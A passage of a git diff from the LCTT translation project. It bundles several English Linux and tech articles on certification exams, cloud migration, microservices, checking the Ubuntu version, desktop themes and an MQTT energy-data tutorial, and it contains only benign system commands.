Once you've identified the skills you need, "really spend some time on those and try to identify whether you think there are areas where you have gaps. You can figure out what the right training or practice regimen is going to be to help you get prepared to take the exam," Seepersad said.

### Practice, practice, practice

"Practice is important, of course, for all exams," he added. "We deliver the exams in a bit of a unique way -- through your browser. We're using a terminal emulator on your browser and you're being proctored, so there's a live human who is watching you via video cam, your screen is being recorded, and you're having to work through the exam console using the browser window. You're going to be asked to do something live on the system, and then at the end, we're going to evaluate that system to see if you were successful in accomplishing the task."

What if you run out of time on your exam, or simply don't pass because you couldn't perform the required skills? "I like the phrase, exam insurance," Seepersad said. "The way we take the stress out is by offering a 'no questions asked' retake. If you take either exam, LFCS or LFCE, and you do not pass on your first attempt, you are automatically eligible to have a free second attempt."

The Linux Foundation intentionally maintains separation between its training and certification programs and uses an independent proctoring solution to monitor candidates. It also requires that all certifications be renewed every two years, which gives potential employers confidence that skills are current and have been recently demonstrated.

### Free certification guide

Becoming a Linux Foundation Certified System Administrator or Engineer is no small feat, so the Foundation has created [this free certification guide][7] to help you with your preparation. In this guide, you'll find:

  * Critical things to keep in mind on test day
  * An array of both free and paid study resources to help you be as prepared as possible
  * A few tips and tricks that could make the difference at exam time
  * A checklist of all the domains and competencies covered in the exam

With certification playing a more important role in securing a rewarding long-term career, careful planning and preparation are key. Stay tuned for the next article in this series that will answer frequently asked questions pertaining to open source certification and training.

[Learn more about Linux training and certification.][8]

--------------------------------------------------------------------------------

via: https://www.linux.com/blog/sysadmin-cert/2018/7/open-source-certification-preparing-exam

作者:[Sam Dean][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.linux.com/users/sam-dean
[1]:https://www.linux.com/blog/os-jobs-report/2017/9/demand-open-source-skills-rise
[2]:https://www.linux.com/blog/sysadmin-cert/2018/7/5-reasons-open-source-certification-matters-more-ever
[3]:https://www.linux.com/blog/sysadmin-cert/2018/7/tips-success-open-source-certification
[4]:https://training.linuxfoundation.org/
[5]:https://training.linuxfoundation.org/certification/linux-foundation-certified-sysadmin-lfcs/
[6]:https://training.linuxfoundation.org/certification/linux-foundation-certified-engineer-lfce/
[7]:https://training.linuxfoundation.org/download-free-certification-prep-guide
[8]:https://training.linuxfoundation.org/certification/
@ -0,0 +1,71 @@
|
|||||||
|
Why moving all your workloads to the cloud is a bad idea
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/cloud-globe.png?itok=_drXt4Tn)
|
||||||
|
|
||||||
|
As we've been exploring in this series, cloud hype is everywhere, telling you that migrating your applications to the cloud—including hybrid cloud and multicloud—is the way to ensure a digital future for your business. This hype rarely dives into the pitfalls of moving to the cloud, nor does it consider the daily work of enhancing your customers' experience and the agile delivery of new and legacy applications.

In [part one][1] of this series, we covered basic definitions (to level the playing field). We outlined our views on hybrid cloud and multi-cloud, making sure to show the dividing lines between the two. This set the stage for [part two][2], where we discussed the first of three pitfalls: Why cost is not always the obvious motivator for moving to the cloud.

In part three, we'll look at the second pitfall: Why moving all your workloads to the cloud is a bad idea.

### Everything's better in the cloud?

There's a misconception that everything will benefit from running in the cloud. Not all workloads are equal, and not all workloads will see a measurable effect on the bottom line from moving to the cloud.

As [InformationWeek wrote][3], "Not all business applications should migrate to the cloud, and enterprises must determine which apps are best suited to a cloud environment." This is a hard fact that the utility company in part two of this series learned when labor costs rose while it tried to move applications to the cloud. Discovering this was not a viable solution, the utility company backed up and reevaluated its applications. It found that some applications were not heavily used and others had data ownership and compliance issues. Some of its applications were not certified for use in a cloud environment.

Sometimes running applications in the cloud is not physically possible, but other times it's not financially viable to run in the cloud.

Imagine a fictional online travel company. As its business grew, it expanded its on-premises hosting capacity to over 40,000 servers. It eventually became a question of expanding resources by purchasing a data center at a time, not a rack at a time. Its business consumes bandwidth at such volumes that cloud pricing models based on bandwidth usage remain prohibitive.

### Get a baseline

As these examples show, nothing is more important than having a thorough understanding of your application landscape. Along with a good understanding of which applications need to migrate to the cloud, you also need to understand your current IT environments, know your present level of resources, and estimate your costs for moving.

Understanding your baseline, meaning each application's current situation and performance requirements (network, storage, CPU, memory, application and infrastructure behavior under load, etc.), gives you the tools to make the right decision.

If you're running servers with single-digit CPU utilization due to complex acquisition processes, a cloud with on-demand resourcing might be a great idea. However, first ask these questions:

* How long has this low utilization existed?

* Why wasn't it caught earlier?

* Is there no process or effective monitoring in place?

* Do you really need a cloud to fix this? Or just a better process for both getting and managing your resources?

* Will you have a better process in the cloud?
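Answering those questions starts with measuring. As a rough sketch (my own illustration, not from the article; the 10% threshold and the sampling approach are assumptions), utilization can be computed from two cumulative busy/total tick samples, the way tools that read `/proc/stat` on Linux do:

```python
def cpu_utilization(sample_start, sample_end):
    """Compute CPU utilization between two cumulative samples.

    Each sample is a (busy_ticks, total_ticks) pair, e.g. derived from
    /proc/stat on Linux. Returns utilization as a fraction in [0, 1].
    """
    busy = sample_end[0] - sample_start[0]
    total = sample_end[1] - sample_start[1]
    if total <= 0:
        raise ValueError("samples must be increasing in time")
    return busy / total

def is_underutilized(samples, threshold=0.10):
    """Flag a server whose average utilization stays below the threshold."""
    utilizations = [cpu_utilization(a, b) for a, b in zip(samples, samples[1:])]
    return sum(utilizations) / len(utilizations) < threshold
```

Collected over weeks rather than hours, a series like this answers "how long has this existed?" with data instead of guesses.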
### Are containers necessary?

Many believe you need containers to be successful in the cloud. This popular [catchphrase][4] sums it up nicely: "We crammed this monolith into a container and called it a microservice."

Containers are a means to an end, and using containers doesn't mean your organization is capable of running maturely in the cloud. It's not about the technology involved; it's about applications that were often written in days gone by with technology that's now outdated. If you put a tire fire into a container and then put that container on a container platform to ship it, it's still a tire fire that someone depends on for functionality.

Is that fire easier to extinguish now? These container fires just create more challenges for your DevOps teams, who are already struggling to keep up with all the changes being pushed through an organization moving everything into the cloud.

Note that it's not necessarily a bad decision to move legacy workloads into the cloud, nor is it a bad idea to containerize them. It's about weighing the benefits and the downsides, assessing the options available, and making the right choices for each of your workloads.

### Coming up

In part four of this series, we'll describe the third and final pitfall everyone should avoid with hybrid multi-cloud. Find out what the cloud means for your data.

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/why-you-cant-move-everything-cloud

作者:[Eric D. Schabell][a]

选题:[lujun9972](https://github.com/lujun9972)

译者:[译者ID](https://github.com/译者ID)

校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/eschabell
[1]:https://opensource.com/article/18/4/pitfalls-hybrid-multi-cloud
[2]:https://opensource.com/article/18/6/reasons-move-to-cloud
[3]:https://www.informationweek.com/cloud/10-cloud-migration-mistakes-to-avoid/d/d-id/1318829
[4]:https://speakerdeck.com/caseywest/containercon-north-america-cloud-anti-patterns?slide=22
@ -1,3 +1,5 @@
translating by bestony

How to use Fio (Flexible I/O Tester) to Measure Disk Performance in Linux
======
![](https://wpmojo.com/wp-content/uploads/2017/08/wpmojo.com-how-to-use-fio-to-measure-disk-performance-in-linux-dotlayer.com-how-to-use-fio-to-measure-disk-performance-in-linux-816x457.jpeg)

@ -1,3 +1,4 @@
Translating by qhwdw
# Understanding metrics and monitoring with Python

![Understanding metrics and monitoring with Python](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/metrics_graph_stats_blue.png?itok=OKCc_60D "Understanding metrics and monitoring with Python")
@ -1,58 +0,0 @@
Everything old is new again: Microservices – DXC Blogs
======
![](https://csccommunity.files.wordpress.com/2018/05/old-building-with-modern-addition.jpg?w=610)

If I told you about a software architecture in which components of an application provided services to other components via a communications protocol over a network you would say it was…

Well, it depends. If you got your start programming in the 90s, you’d say I just defined a [Service-Oriented Architecture (SOA)][1]. But, if you’re younger and cut your developer teeth on the cloud, you’d say: “Oh, you’re talking about [microservices][2].”

You’d both be right. To really understand the differences, you need to dive deeper into these architectures.

In SOA, a service is a function that is well-defined, self-contained, and doesn’t depend on the context or state of other services. There are two kinds of services: a service consumer, which requests a service, and a service provider, which fulfills that request. An SOA service can play both roles.

SOA services can trade data with each other. Two or more services can also coordinate with each other. These services carry out basic jobs such as creating a user account, providing login functionality, or validating a payment.

SOA isn’t so much about modularizing an application as it is about composing an application by integrating distributed, separately maintained and deployed components. These components run on servers.

Early versions of SOA used object-oriented protocols to communicate with each other. For example, Microsoft’s [Distributed Component Object Model (DCOM)][3] and [Object Request Brokers (ORBs)][4] that use the [Common Object Request Broker Architecture (CORBA)][5] specification.

Later versions used messaging services such as [Java Message Service (JMS)][6] or [Advanced Message Queuing Protocol (AMQP)][7]. These service connections are called Enterprise Service Buses (ESBs). Over these buses, data, almost always in eXtensible Markup Language (XML) format, is transmitted and received.

[Microservices][2] is an architectural style in which applications are made up of loosely coupled services or modules. It lends itself to the Continuous Integration/Continuous Deployment (CI/CD) model of developing large, complex applications. An application is the sum of its modules.

Each microservice provides an application programming interface (API) endpoint. These are connected by lightweight protocols such as [REpresentational State Transfer (REST)][8] or [gRPC][9]. Data tends to be represented by [JavaScript Object Notation (JSON)][10] or [Protobuf][11].
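To make that concrete, here is a minimal sketch of a single microservice endpoint speaking JSON over HTTP, using only the Python standard library (the `/account/<id>` route and its payload are invented for illustration; a real service would add validation, persistence, and error handling):

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

class AccountHandler(BaseHTTPRequestHandler):
    """One microservice endpoint: GET /account/<id> returns a JSON document."""

    def do_GET(self):
        account_id = self.path.rsplit("/", 1)[-1]
        body = json.dumps({"id": account_id, "status": "active"}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the example quiet; a real service would log requests

def serve(port=0):
    """Start the endpoint on a background thread; port 0 picks a free port."""
    server = HTTPServer(("127.0.0.1", port), AccountHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Any client that can issue an HTTP request and parse JSON can consume this endpoint, which is exactly the loose coupling the paragraph describes.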
Both architectures stand as an alternative to the older, monolithic style of architecture in which applications are built as single, autonomous units. For example, in a client-server model, a typical Linux, Apache, MySQL, PHP/Python/Perl (LAMP) server-side application would deal with HTTP requests, run sub-programs, and retrieve data from or update the underlying MySQL database. These are all tied closely together. When you change anything, you must build and deploy a new version.

With SOA, you may need to change several components, but never the entire application. With microservices, though, you can make changes one service at a time. With microservices, you’re working with a truly decoupled architecture.

Microservices are also lighter than SOA. While SOA services are deployed to servers and virtual machines (VMs), microservices are deployed in containers. The protocols are also lighter. This makes microservices more flexible than SOA. Hence, they work better with Agile shops.

So what does this mean? The long and short of it is that microservices are an SOA variation for container and cloud computing.

Old-style SOA isn’t going away, but as we continue to move applications to containers, the microservice architecture will only grow more popular.

--------------------------------------------------------------------------------

via: https://blogs.dxc.technology/2018/05/08/everything-old-is-new-again-microservices/

作者:[Cloudy Weather][a]

选题:[lujun9972](https://github.com/lujun9972)

译者:[译者ID](https://github.com/译者ID)

校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://blogs.dxc.technology/author/steven-vaughan-nichols/
[1]:https://www.service-architecture.com/articles/web-services/service-oriented_architecture_soa_definition.html
[2]:http://microservices.io/
[3]:https://technet.microsoft.com/en-us/library/cc958799.aspx
[4]:https://searchmicroservices.techtarget.com/definition/Object-Request-Broker-ORB
[5]:http://www.corba.org/
[6]:https://docs.oracle.com/javaee/6/tutorial/doc/bncdq.html
[7]:https://www.amqp.org/
[8]:https://www.service-architecture.com/articles/web-services/representational_state_transfer_rest.html
[9]:https://grpc.io/
[10]:https://www.json.org/
[11]:https://github.com/google/protobuf/
@ -1,127 +0,0 @@
How To Check Ubuntu Version and Other System Information Easily
======
**Brief: Wondering which Ubuntu version you are using? Here’s how to check your Ubuntu version, desktop environment and other relevant system information.**

You can easily find the Ubuntu version you are using in the command line or via the graphical interface. Knowing the exact Ubuntu version, desktop environment and other system information helps a lot when you are trying to follow a tutorial from the web or seeking help in various forums.

In this quick tip, I’ll show you various ways to check the [Ubuntu][1] version and other common system information.

### How to check Ubuntu version in terminal

This is the best way to find your Ubuntu version. I could have mentioned the graphical way first, but I chose this method because it doesn’t depend on the [desktop environment][2] you are using. You can use it on any Ubuntu variant.

Open a terminal (Ctrl+Alt+T) and type the following command:

```
lsb_release -a
```

The output of the above command should be like this:

```
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.4 LTS
Release: 16.04
Codename: xenial
```

![How to check Ubuntu version in command line][3]

As you can see, the current Ubuntu installed in my system is Ubuntu 16.04 and its code name is Xenial.

Wait! Why does it say Ubuntu 16.04.4 in Description and 16.04 in Release? Which one is it, 16.04 or 16.04.4? What’s the difference between the two?

The short answer is that you are using Ubuntu 16.04. That’s the base image. 16.04.4 signifies the fourth point release of 16.04. A point release can be thought of as a service pack in the Windows era. Both 16.04 and 16.04.4 are correct answers here.

What’s Xenial in the output? That’s the codename of the Ubuntu 16.04 release. You can read this [article to know about Ubuntu naming conventions][4].

#### Some alternate ways to find Ubuntu version

Alternatively, you can use either of the following commands to find your Ubuntu version:

```
cat /etc/lsb-release
```

The output of the above command would look like this:

```
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
```

![How to check Ubuntu version in command line][5]
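Because `/etc/lsb-release` is plain `KEY=VALUE` text, scripts can parse it easily. Here is a small sketch (my own illustration, not part of the original tip) that turns content in that format into a dictionary:

```python
def parse_lsb_release(text):
    """Parse /etc/lsb-release-style KEY=VALUE lines into a dict."""
    info = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or "=" not in line:
            continue  # skip blank or malformed lines
        key, _, value = line.partition("=")
        info[key] = value.strip('"')  # values may be double-quoted
    return info

# Sample content matching the output shown above.
sample = """\
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
"""
```

On a real Ubuntu system you would feed it `open("/etc/lsb-release").read()` instead of the sample string.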
You can also use this command to find the Ubuntu version:

```
cat /etc/issue
```

The output of this command will be like this:

```
Ubuntu 16.04.4 LTS \n \l
```

Forget the \n \l. The Ubuntu version is 16.04.4 in this case, or simply Ubuntu 16.04.

### How to check Ubuntu version graphically

Checking the Ubuntu version graphically is no big deal either. I am going to use screenshots from Ubuntu 18.04 GNOME here. Things may look different if you are using Unity or some other desktop environment. This is why I recommend the command-line methods discussed in the previous sections: they don’t depend on the desktop environment.

I’ll show you how to find the desktop environment in the next section.

For now, go to System Settings and look under the Details segment.

![Finding Ubuntu version graphically][6]

You should see the Ubuntu version here along with information about the desktop environment you are using, [GNOME][7] being the case here.

![Finding Ubuntu version graphically][8]

### How to know the desktop environment and other system information in Ubuntu

So you just learned how to find your Ubuntu version. What about the desktop environment in use? Which Linux kernel version is being used?

Of course, there are various commands you can use to get all that information, but I’ll recommend a command-line utility called [Neofetch][9]. It shows essential system information beautifully in the terminal, along with the logo of Ubuntu or whatever Linux distribution you are using.

Install Neofetch using the command below:

```
sudo apt install neofetch
```

Once installed, simply run the command `neofetch` in the terminal and see a beautiful display of system information.

![System information in Linux terminal][10]

As you can see, Neofetch shows you the Linux kernel version, the Ubuntu version, the desktop environment and its version, the themes and icons in use, and more.

I hope this helps you find your Ubuntu version and other system information. If you have suggestions to improve this article, feel free to drop them in the comment section. Ciao :)

--------------------------------------------------------------------------------

via: https://itsfoss.com/how-to-know-ubuntu-unity-version/

作者:[Abhishek Prakash][a]

选题:[lujun9972](https://github.com/lujun9972)

译者:[译者ID](https://github.com/译者ID)

校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]: https://itsfoss.com/author/abhishek/
[1]:https://www.ubuntu.com/
[2]:https://en.wikipedia.org/wiki/Desktop_environment
[3]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/check-ubuntu-version-command-line-1-800x216.jpeg
[4]:https://itsfoss.com/linux-code-names/
[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/check-ubuntu-version-command-line-2-800x185.jpeg
[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/ubuntu-version-system-settings.jpeg
[7]:https://www.gnome.org/
[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/checking-ubuntu-version-gui.jpeg
[9]:https://itsfoss.com/display-linux-logo-in-ascii/
[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/ubuntu-system-information-terminal-800x400.jpeg
@ -1,3 +1,4 @@
Translating by qhwdw
Splicing the Cloud Native Stack, One Floor at a Time
======
At Packet, our value (automated infrastructure) is super fundamental. As such, we spend an enormous amount of time looking up at the players and trends in all the ecosystems above us - as well as the very few below!
@ -1,94 +0,0 @@
translating---geekpi

Give Your Linux Desktop a Stunning Makeover With Xenlism Themes
============================================================

_Brief: The Xenlism theme pack provides an aesthetically pleasing GTK theme, colorful icons, and minimalist wallpapers to transform your Linux desktop into an eye-catching setup._

It’s not every day that I dedicate an entire article to a theme, unless I find something really awesome. I used to cover themes and icons regularly. But lately, I have preferred curating lists of the [best GTK themes][6] and icon themes. This is more convenient for me, and for you as well, as you get to see many beautiful themes in one place.

After the [Pop OS theme][7] suite, Xenlism is another theme that has left me awestruck by its look.

![Xenlism GTK theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlishm-minimalism-gtk-theme-800x450.jpeg)

The Xenlism GTK theme is based on the Arc theme, an inspiration behind so many themes these days. The GTK theme provides window buttons similar to macOS, which I neither like nor dislike. The GTK theme has a flat, minimalist layout, and I like that.

There are two icon themes in the Xenlism suite. Xenlism Wildfire is the older one and had already made it to our list of [best icon themes][8].

![Beautiful Xenlism Wildfire theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlism-wildfire-theme-800x450.jpeg)

Xenlism Wildfire Icons

Xenlism Storm is a relatively new icon theme but is equally beautiful.

![Beautiful Xenlism Storm theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlism-storm-theme-1-800x450.jpeg)

Xenlism Storm Icons

Xenlism themes are open source under the GPL license.

### How to install the Xenlism theme pack on Ubuntu 18.04

The Xenlism developer provides an easy way to install the theme pack through a PPA. Though the PPA is available for Ubuntu 16.04, I found the GTK theme wasn’t working with Unity. It works fine with the GNOME desktop in Ubuntu 18.04.

Open a terminal (Ctrl+Alt+T) and use the following commands one by one:

```
sudo add-apt-repository ppa:xenatt/xenlism
sudo apt update
```

This PPA offers four packages:

* xenlism-finewalls: a set of wallpapers that will be available directly in the wallpaper section of Ubuntu. One of the wallpapers has been used in the screenshot.

* xenlism-minimalism-theme: the GTK theme

* xenlism-storm-icon-theme: an icon theme (see previous screenshots)

* xenlism-wildfire-icon-theme: another icon theme with several color variants (folder colors change between variants)

You can decide for yourself which theme components you want to install. Personally, I don’t see any harm in installing all of them.

```
sudo apt install xenlism-minimalism-theme xenlism-storm-icon-theme xenlism-wildfire-icon-theme xenlism-finewalls
```

You can use GNOME Tweaks to change the theme and icons. If you are not familiar with the procedure, I suggest reading this tutorial to learn [how to install themes in Ubuntu 18.04 GNOME][9].

### Getting Xenlism themes in other Linux distributions

You can install Xenlism themes on other Linux distributions as well. Installation instructions for various Linux distributions can be found on its website:

[Install Xenlism Themes][10]

### What do you think?

I know not everyone will agree with me, but I loved this theme. I think you are going to see glimpses of the Xenlism theme in screenshots in future tutorials on It’s FOSS.

Did you like the Xenlism theme? If not, which theme do you like the most? Share your opinion in the comment section below.

#### About the author

I am a professional software developer, and founder of It's FOSS. I am an avid Linux lover and Open Source enthusiast. I use Ubuntu and believe in sharing knowledge. Apart from Linux, I love classic detective mysteries. I'm a huge fan of Agatha Christie's work.

--------------------------------------------------------------------------------

via: https://itsfoss.com/xenlism-theme/

作者:[Abhishek Prakash][a]

译者:[译者ID](https://github.com/译者ID)

校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://itsfoss.com/author/abhishek/
[1]:https://itsfoss.com/author/abhishek/
[2]:https://itsfoss.com/xenlism-theme/#comments
[3]:https://itsfoss.com/category/desktop/
[4]:https://itsfoss.com/tag/themes/
[5]:https://itsfoss.com/tag/xenlism/
[6]:https://itsfoss.com/best-gtk-themes/
[7]:https://itsfoss.com/pop-icon-gtk-theme-ubuntu/
[8]:https://itsfoss.com/best-icon-themes-ubuntu-16-04/
[9]:https://itsfoss.com/install-themes-ubuntu/
[10]:http://xenlism.github.io/minimalism/#install
@ -1,3 +1,5 @@
pinewall translating

How Graphics Cards Work
======
![AMD-Polaris][1]

@ -1,3 +1,5 @@
translating---geekpi

GitLab’s Ultimate & Gold Plans Are Now Free For Open-Source Projects
======
A lot has happened in the open-source community recently. First, [Microsoft acquired GitHub][1] and then people started to look for [GitHub alternatives][2] without even taking a second to think about it while Linus Torvalds released the [Linux Kernel 4.17][3]. Well, if you’ve been following us, I assume that you know all that.
@ -1,311 +0,0 @@
pinewall translating

Using MQTT to send and receive data for your next project
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/toolbox-learn-draw-container-yearbook.png?itok=xDbwz1pP)

Last November we bought an electric car, and it raised an interesting question: When should we charge it? I was concerned about having the lowest emissions for the electricity used to charge the car, so this is a specific question: What is the rate of CO2 emissions per kWh at any given time, and when during the day is it at its lowest?

### Finding the data

I live in New York State. About 80% of our electricity comes from in-state generation, mostly through natural gas, hydro dams (much of it from Niagara Falls), nuclear, and a bit of wind, solar, and other fossil fuels. The entire system is managed by the [New York Independent System Operator][1] (NYISO), a not-for-profit entity that was set up to balance the needs of power generators, consumers, and regulatory bodies to keep the lights on in New York.

Although there is no official public API, as part of its mission, NYISO makes [a lot of open data][2] available for public consumption. This includes reporting on what fuels are being consumed to generate power, at five-minute intervals, throughout the state. These are published as CSV files on a public archive and updated throughout the day. If you know the number of megawatts coming from different kinds of fuels, you can make a reasonable approximation of how much CO2 is being emitted at any given time.

We should always be kind when building tools to collect and process open data to avoid overloading those systems. Instead of sending everyone to their archive service to download the files all the time, we can do better. We can create a low-overhead event stream that people can subscribe to and get updates as they happen. We can do that with [MQTT][3]. The target for my project ([ny-power.org][4]) was inclusion in the [Home Assistant][5] project, an open source home automation platform that has hundreds of thousands of users. If all of these users were hitting this CSV server all the time, NYISO might need to restrict access to it.

### What is MQTT?

MQTT is a publish/subscribe (pubsub) wire protocol designed with small devices in mind. Pubsub systems work like a message bus. You send a message to a topic, and any software with a subscription for that topic gets a copy of your message. As a sender, you never really know who is listening; you just provide your information to a set of topics and listen for any other topics you might care about. It's like walking into a party and listening for interesting conversations to join.
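The pubsub model described above can be sketched in a few lines. This is a toy in-process bus for illustration only; a real MQTT broker such as Mosquitto adds networking, QoS, sessions, and much more:

```python
class TinyBus:
    """Toy in-process pubsub bus illustrating the MQTT model."""

    def __init__(self):
        self.subscribers = {}  # topic -> list of callbacks

    def subscribe(self, topic, callback):
        self.subscribers.setdefault(topic, []).append(callback)

    def publish(self, topic, message):
        # The sender never knows who is listening; every current
        # subscriber on the topic gets a copy of the message.
        for callback in self.subscribers.get(topic, []):
            callback(topic, message)
```

A subscriber simply registers a callback on the topic it cares about; messages on every other topic never reach it.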
This can make for extremely efficient applications. Clients subscribe to a narrow selection of topics and only receive the information they are looking for. This saves both processing time and network bandwidth.

As an open standard, MQTT has many open source implementations of both clients and servers. There are client libraries for every language you could imagine, even a library you can embed in Arduino for making sensor networks. There are many servers to choose from. My go-to is the [Mosquitto][6] server from Eclipse, as it's small, written in C, and can handle tens of thousands of subscribers without breaking a sweat.

### Why I like MQTT

Over the past two decades, we've come up with tried and true models for software applications to ask questions of services. Do I have more email? What is the current weather? Should I buy this thing now? This pattern of "ask/receive" works well much of the time; however, in a world awash with data, there are other patterns we need. The MQTT pubsub model is powerful where lots of data is published inbound to the system. Clients can subscribe to narrow slices of data and receive updates instantly when that data comes in.

MQTT also has additional interesting features, such as "last-will-and-testament" messages, which make it possible to distinguish between silence because there is no relevant data and silence because your data collectors have crashed. MQTT also has retained messages, which provide the last message on a topic to clients when they first connect. This is extremely useful for topics that update slowly.
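Retained messages are easy to picture: the broker keeps the last retained message per topic and replays it to each new subscriber on connect. A toy sketch of just that behavior (illustrative only, not the real broker logic):

```python
class RetainingBus:
    """Toy broker fragment showing MQTT-style retained messages."""

    def __init__(self):
        self.retained = {}     # topic -> last retained message
        self.subscribers = {}  # topic -> list of callbacks

    def publish(self, topic, message, retain=False):
        if retain:
            self.retained[topic] = message
        for callback in self.subscribers.get(topic, []):
            callback(topic, message)

    def subscribe(self, topic, callback):
        self.subscribers.setdefault(topic, []).append(callback)
        if topic in self.retained:
            # New subscribers immediately receive the last retained
            # message, so slowly updating topics still have a value.
            callback(topic, self.retained[topic])
```

This is why a client connecting at any time of day can get the most recent fuel-mix value without waiting for the next five-minute update.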
In my work with the Home Assistant project, I've found this message bus model works extremely well for heterogeneous systems. If you dive into the Internet of Things space, you'll quickly run into MQTT everywhere.

### Our first MQTT stream

One of NYISO's CSV files is the real-time fuel mix. Every five minutes, it's updated with the fuel sources and power generated (in megawatts) during that time period.

The CSV file looks something like this:

| Time Stamp | Time Zone | Fuel Category | Gen MW |
| --- | --- | --- | --- |
| 05/09/2018 00:05:00 | EDT | Dual Fuel | 1400 |
| 05/09/2018 00:05:00 | EDT | Natural Gas | 2144 |
| 05/09/2018 00:05:00 | EDT | Nuclear | 4114 |
| 05/09/2018 00:05:00 | EDT | Other Fossil Fuels | 4 |
| 05/09/2018 00:05:00 | EDT | Other Renewables | 226 |
| 05/09/2018 00:05:00 | EDT | Wind | 1 |
| 05/09/2018 00:05:00 | EDT | Hydro | 3229 |
| 05/09/2018 00:10:00 | EDT | Dual Fuel | 1307 |
| 05/09/2018 00:10:00 | EDT | Natural Gas | 2092 |
| 05/09/2018 00:10:00 | EDT | Nuclear | 4115 |
| 05/09/2018 00:10:00 | EDT | Other Fossil Fuels | 4 |
| 05/09/2018 00:10:00 | EDT | Other Renewables | 224 |
| 05/09/2018 00:10:00 | EDT | Wind | 40 |
| 05/09/2018 00:10:00 | EDT | Hydro | 3166 |

The only odd thing in the table is the dual-fuel category. Most natural gas plants in New York can also burn other fossil fuels to generate power. During cold snaps in the winter, the natural gas supply gets constrained, and its use for home heating is prioritized over power generation. This happens at a low enough frequency that we can consider dual fuel to be natural gas (for our calculations).
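Given a fuel-mix snapshot like the table above, the CO2 intensity calculation is a weighted average. The emission factors below are illustrative placeholders, not the values the project actually derives:

```python
# Illustrative lbs-CO2-per-MWh factors; the real project derives its own.
EMISSION_FACTORS = {
    "Dual Fuel": 900,  # treated as natural gas, per the text above
    "Natural Gas": 900,
    "Other Fossil Fuels": 2000,
    "Nuclear": 0,
    "Hydro": 0,
    "Wind": 0,
    "Other Renewables": 0,
}

def co2_intensity(fuel_mix_mw):
    """Return grid CO2 intensity (lbs/MWh) for a {fuel: MW} snapshot."""
    total_mw = sum(fuel_mix_mw.values())
    emitted = sum(EMISSION_FACTORS[fuel] * mw
                  for fuel, mw in fuel_mix_mw.items())
    return emitted / total_mw
```

The more of the mix that comes from nuclear, hydro, and wind at a given moment, the lower the intensity, which is exactly the number the car-charging question needs.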
|
|
||||||
|
|
||||||
The file is updated throughout the day. I created a simple data pump that polls for the file every minute and looks for updates. It publishes any new entries out to the MQTT server into a set of topics that largely mirror this CSV file. The payload is turned into a JSON object that is easy to parse from nearly any programming language.
|
|
||||||
```
ny-power/upstream/fuel-mix/Hydro {"units": "MW", "value": 3229, "ts": "05/09/2018 00:05:00"}
ny-power/upstream/fuel-mix/Dual Fuel {"units": "MW", "value": 1400, "ts": "05/09/2018 00:05:00"}
ny-power/upstream/fuel-mix/Natural Gas {"units": "MW", "value": 2144, "ts": "05/09/2018 00:05:00"}
ny-power/upstream/fuel-mix/Other Fossil Fuels {"units": "MW", "value": 4, "ts": "05/09/2018 00:05:00"}
ny-power/upstream/fuel-mix/Wind {"units": "MW", "value": 41, "ts": "05/09/2018 00:05:00"}
ny-power/upstream/fuel-mix/Other Renewables {"units": "MW", "value": 226, "ts": "05/09/2018 00:05:00"}
ny-power/upstream/fuel-mix/Nuclear {"units": "MW", "value": 4114, "ts": "05/09/2018 00:05:00"}
```
This direct reflection is a good first step in turning open data into open events. We'll be converting this into a CO2 intensity, but other applications might want these raw feeds to do other calculations with them.
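The per-row conversion the data pump performs can be sketched as a small pure function. This is an illustration, not the actual pump code from the ny-power repository; the helper name `to_mqtt_message` and the topic root constant are my own:

```python
import json

# Root of the raw-data topic tree, mirroring the article's layout.
TOPIC_ROOT = "ny-power/upstream/fuel-mix"

def to_mqtt_message(row):
    """Convert one CSV row (as a dict) into an MQTT topic and JSON payload."""
    # The fuel category becomes the last level of the topic hierarchy.
    topic = "%s/%s" % (TOPIC_ROOT, row["Fuel Category"])
    payload = json.dumps({
        "units": "MW",
        "value": int(row["Gen MW"]),
        "ts": row["Time Stamp"],
    })
    return topic, payload

topic, payload = to_mqtt_message({
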